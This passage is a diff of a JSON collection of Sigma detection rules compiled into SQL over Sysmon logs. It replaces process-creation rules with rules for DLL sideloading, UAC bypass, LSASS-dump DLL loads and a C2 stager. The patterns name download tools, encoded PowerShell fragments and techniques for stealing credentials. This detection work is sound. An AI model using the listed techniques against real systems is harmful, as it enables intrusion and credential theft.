(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR 
CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": 
"f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "status": "test", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", 
- "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + 
"Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files 
(x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": 
"b222df08-0e07-11eb-adc1-0242ac120002", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": 
"4fc0deee-0057-4998-ab31-d24e46e0aba4", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE 
